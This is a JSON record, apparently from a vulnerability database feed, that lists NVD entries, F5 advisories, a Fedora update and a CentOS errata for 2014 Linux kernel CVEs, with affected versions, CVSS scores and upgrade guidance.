"cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.17.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.7:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.12.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.17.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.15.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.6:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.15.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.1:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.10.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.17.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.4:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:58:23", "description": "Multiple stack-based buffer overflows in the magicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the Magic Mouse HID driver in the Linux kernel through 3.16.3 allow physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted device that provides a large amount of (1) EHCI or (2) XHCI data associated with an event.", "edition": 5, "cvss3": {}, "published": "2014-09-28T10:55:00", "title": "CVE-2014-3181", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3181"], "modified": "2015-03-26T01:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.16.3", "cpe:/o:linux:linux_kernel:3.16.0", "cpe:/o:linux:linux_kernel:3.16.2", "cpe:/o:linux:linux_kernel:3.16.1"], "id": "CVE-2014-3181", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3181", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:58:23", "description": "Buffer overflow in the picolcd_raw_event function in devices/hid/hid-picolcd_core.c in the PicoLCD HID device driver in the Linux kernel through 3.16.3, as used in Android on Nexus 7 devices, allows physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted device that sends a large report.", "edition": 5, "cvss3": {}, "published": "2014-09-28T10:55:00", "title": "CVE-2014-3186", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3186"], "modified": "2015-05-14T02:00:00", "cpe": ["cpe:/o:linux:linux_kernel:3.16.3", "cpe:/o:linux:linux_kernel:3.16.0", "cpe:/o:linux:linux_kernel:3.16.2", "cpe:/o:linux:linux_kernel:3.16.1", "cpe:/h:google:nexus_7:-"], "id": "CVE-2014-3186", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3186", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.2:*:*:*:*:*:*:*", "cpe:2.3:h:google:nexus_7:-:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:58:21", "description": "The media_device_enum_entities function in drivers/media/media-device.c in the Linux kernel before 3.14.6 does not initialize a certain data structure, which allows local users to obtain sensitive information from kernel memory by leveraging /dev/media0 read access for a MEDIA_IOC_ENUM_ENTITIES ioctl call.", "edition": 7, "cvss3": {}, "published": "2014-06-23T11:21:00", "title": "CVE-2014-1739", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1739"], "modified": "2020-08-19T19:18:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:suse:linux_enterprise_high_availability_extension:11", "cpe:/o:suse:suse_linux_enterprise_desktop:11", "cpe:/o:suse:suse_linux_enterprise_server:11"], "id": "CVE-2014-1739", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1739", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:suse:suse_linux_enterprise_server:11:sp3:*:*:*:vmware:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:11:sp3:*:*:*:-:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:suse:linux_enterprise_high_availability_extension:11:sp3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11:sp3:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-06-08T00:16:07", "bulletinFamily": "software", "cvelist": ["CVE-2014-6410"], "edition": 1, "description": "\nF5 Product Development has assigned ID 501305, 582952 (BIG-IP), ID 488801 (BIG-IQ) and ID 488802 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H599641 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.4.0 - 11.6.0 \n11.2.1 \n10.2.1 - 10.2.4| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| Low| Linux Kernel \nBIG-IP AAM| 11.4.0 - 11.6.0| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| Low| Linux Kernel \nBIG-IP AFM| 11.4.0 - 11.6.0| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| Low| Linux Kernel \nBIG-IP Analytics| 11.4.0 - 11.6.0| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| Low| Linux Kernel \nBIG-IP APM| 11.4.0 - 11.6.0| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| Low| Linux Kernel \nBIG-IP ASM| 11.4.0 - 11.6.0 \n11.2.1 \n10.2.1 - 10.2.4| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| Low| Linux Kernel \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.2.1 \n10.2.1 - 10.2.4| None| Low| Linux Kernel \nBIG-IP GTM| 11.4.0 - 11.6.0 \n11.2.1 \n10.2.1 - 10.2.4| 11.6.1 \n11.5.4 HF2| Low| Linux Kernel \nBIG-IP Link Controller| 11.4.0 - 11.6.0 \n11.2.1 \n10.2.1 - 10.2.4| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| Low| Linux Kernel \nBIG-IP PEM| 11.4.0 - 11.6.0| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| Low| Linux Kernel \nBIG-IP PSM| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| None| Low| Linux Kernel \nBIG-IP WebAccelerator| 11.2.1 \n10.2.1 - 10.2.4| None| Low| Linux Kernel \nBIG-IP WOM| 11.2.1 \n10.2.1 - 10.2.4| None| Low| Linux Kernel \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.1.1| None| Medium| Linux Kernel \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None \n| Medium| Linux Kernel \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| Linux Kernel \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| Linux Kernel \nBIG-IQ ADC| 4.5.0| None| Medium | Linux Kernel \nBIG-IQ Centralized Management| 5.0.0| None| Medium| Linux Kernel \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| Linux Kernel \nF5 iWorkflow| 2.0.0| None| Medium| Linux Kernel \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable | None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 5.0.0 \n4.0.0 - 4.4.0| None| Low| Linux Kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K6664: Obtaining and installing OPSWAT hotfixes](<https://support.f5.com/csp/article/K6664>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "modified": "2017-04-06T16:50:00", "published": "2016-06-18T01:59:00", "href": "https://support.f5.com/csp/article/K41739114", "id": "F5:K41739114", "type": "f5", "title": "Linux kernel vulnerability CVE-2014-6410", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:30", "bulletinFamily": "software", "cvelist": ["CVE-2014-4027"], "edition": 1, "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2015-04-30T00:00:00", "published": "2015-04-30T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/500/sol16531.html", "id": "SOL16531", "title": "SOL16531 - Linux kernel vulnerability CVE-2014-4027", "type": "f5", "cvss": {"score": 2.3, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:23:05", "bulletinFamily": "software", "cvelist": ["CVE-2014-6410"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL15106: Managing BIG-IQ product hotfixes\n * SOL15113: BIG-IQ hotfix matrix\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "edition": 1, "modified": "2016-08-03T00:00:00", "published": "2016-06-17T00:00:00", "id": "SOL41739114", "href": "http://support.f5.com/kb/en-us/solutions/public/k/41/sol41739114.html", "type": "f5", "title": "SOL41739114 - Linux kernel vulnerability CVE-2014-6410", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-12-20T22:22:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-3688"], "description": "\nF5 Product Development has assigned ID 493761 (BIG-IP), ID 499504 (BIG-IQ), and ID 499505 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<https://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H501695 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4 HF2| Linux kernel (MGMT interface) \nBIG-IP AAM| 11.4.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4 HF2| Linux kernel (MGMT interface) \nBIG-IP AFM| 11.3.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4 HF2| Linux kernel (MGMT interface) \nBIG-IP Analytics| 11.0.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4 HF2| Linux kernel (MGMT interface) \nBIG-IP APM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4 HF2| Linux kernel (MGMT interface) \nBIG-IP ASM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4 HF2| Linux kernel (MGMT interface) \nBIG-IP DNS| None| 12.0.0| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Linux kernel (MGMT interface) \nBIG-IP GTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 11.6.1 \n11.5.4 HF2| Linux kernel (MGMT interface) \nBIG-IP Link Controller| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4 HF2| Linux kernel (MGMT interface) \nBIG-IP PEM| 11.3.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4 HF2| Linux kernel (MGMT interface) \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Linux kernel (MGMT interface) \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Linux kernel (MGMT interface) \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Linux kernel (MGMT interface) \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None| Linux kernel (MGMT interface) \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Linux kernel (MGMT interface) \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Linux kernel (MGMT interface) \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Linux kernel (MGMT interface) \nBIG-IQ ADC| 4.5.0| None| Linux kernel (MGMT interface) \nBIG-IQ Centralized Management| 4.6.0| 5.0.0| Linux kernel (MGMT interface) \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Linux kernel (MGMT interface) \nF5 iWorkflow| None| 2.0.0| None \nLineRate| None| 2.2.0 - 2.5.0 \n1.6.0 - 1.6.4| None \n \n**Important**: The affected versions ship with vulnerable code (SCTP kernel module), but do not enable the code by default. If the kernel module is loaded, the BIG-IP management (MGMT) interface is vulnerable to the CVE.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K17329: BIG-IP GTM name has changed to BIG-IP DNS](<https://support.f5.com/csp/article/K17329>) \n", "edition": 1, "modified": "2018-06-10T01:58:00", "published": "2015-01-27T01:15:00", "id": "F5:K16025", "href": "https://support.f5.com/csp/article/K16025", "title": "Linux kernel SCTP vulnerability CVE-2014-3688", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-3688"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL17329: BIG-IP GTM name has changed to BIG-IP DNS\n", "modified": "2016-07-22T00:00:00", "published": "2015-01-26T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/000/sol16025.html", "id": "SOL16025", "title": "SOL16025 - Linux kernel SCTP vulnerability CVE-2014-3688", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:09:38", "bulletinFamily": "software", "cvelist": ["CVE-2014-3940", "CVE-2014-4027"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity **values published in the previous table. The** Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL17329: BIG-IP GTM name has changed to BIG-IP DNS\n", "modified": "2016-05-28T00:00:00", "published": "2014-10-15T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15685.html", "id": "SOL15685", "title": "SOL15685 - Linux kernel vulnerability CVE-2014-3940", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3181", "CVE-2014-3186", "CVE-2014-6410"], "description": "The kernel meta package ", "modified": "2014-09-23T04:43:38", "published": "2014-09-23T04:43:38", "id": "FEDORA:6800622747", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: kernel-3.16.3-300.fc21", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:32", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3182", "CVE-2014-3186", "CVE-2014-4655", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-3688", "CVE-2013-2929", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-5045", "CVE-2014-4656", "CVE-2014-3631", "CVE-2014-4652", "CVE-2014-6410", "CVE-2014-3184", "CVE-2014-3687"], "description": "**CentOS Errata and Security Advisory** CESA-2014:1971\n\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled malformed or duplicate Address Configuration Change Chunks\n(ASCONF). A remote attacker could use either of these flaws to crash the\nsystem. (CVE-2014-3673, CVE-2014-3687, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an excessive\namount of memory, leading to a denial of service. (CVE-2014-3688,\nImportant)\n\n* Two flaws were found in the way the Apple Magic Mouse/Trackpad\nmulti-touch driver and the Minibox PicoLCD driver handled invalid HID\nreports. An attacker with physical access to the system could use these\nflaws to crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2014-3181, CVE-2014-3186, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB Request\nBlocks buffers. An attacker with physical access to the system could use\nthis flaw to crash the system or, potentially, escalate their privileges on\nthe system. (CVE-2014-3185, Moderate)\n\n* A flaw was found in the way the Linux kernel's keys subsystem handled the\ntermination condition in the associative array garbage collection\nfunctionality. A local, unprivileged user could use this flaw to crash the\nsystem. (CVE-2014-3631, Moderate)\n\n* Multiple flaws were found in the way the Linux kernel's ALSA\nimplementation handled user controls. A local, privileged user could use\neither of these flaws to crash the system. (CVE-2014-4654, CVE-2014-4655,\nCVE-2014-4656, Moderate)\n\n* A flaw was found in the way the Linux kernel's VFS subsystem handled\nreference counting when performing unmount operations on symbolic links.\nA local, unprivileged user could use this flaw to exhaust all available\nmemory on the system or, potentially, trigger a use-after-free error,\nresulting in a system crash or privilege escalation. (CVE-2014-5045,\nModerate)\n\n* A flaw was found in the way the get_dumpable() function return value was\ninterpreted in the ptrace subsystem of the Linux kernel. When\n'fs.suid_dumpable' was set to 2, a local, unprivileged local user could\nuse this flaw to bypass intended ptrace restrictions and obtain\npotentially sensitive information. (CVE-2013-2929, Low)\n\n* A stack overflow flaw caused by infinite recursion was found in the way\nthe Linux kernel's UDF file system implementation processed indirect ICBs.\nAn attacker with physical access to the system could use a specially\ncrafted UDF image to crash the system. (CVE-2014-6410, Low)\n\n* An information leak flaw in the way the Linux kernel handled media device\nenumerate entities IOCTL requests could allow a local user able to access\nthe /dev/media0 device file to leak kernel memory bytes. (CVE-2014-1739,\nLow)\n\n* An out-of-bounds read flaw in the Logitech Unifying receiver driver could\nallow an attacker with physical access to the system to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2014-3182,\nLow)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled invalid HID\nreports. An attacker with physical access to the system could use either of\nthese flaws to write data past an allocated memory buffer. (CVE-2014-3184,\nLow)\n\n* An information leak flaw was found in the RAM Disks Memory Copy 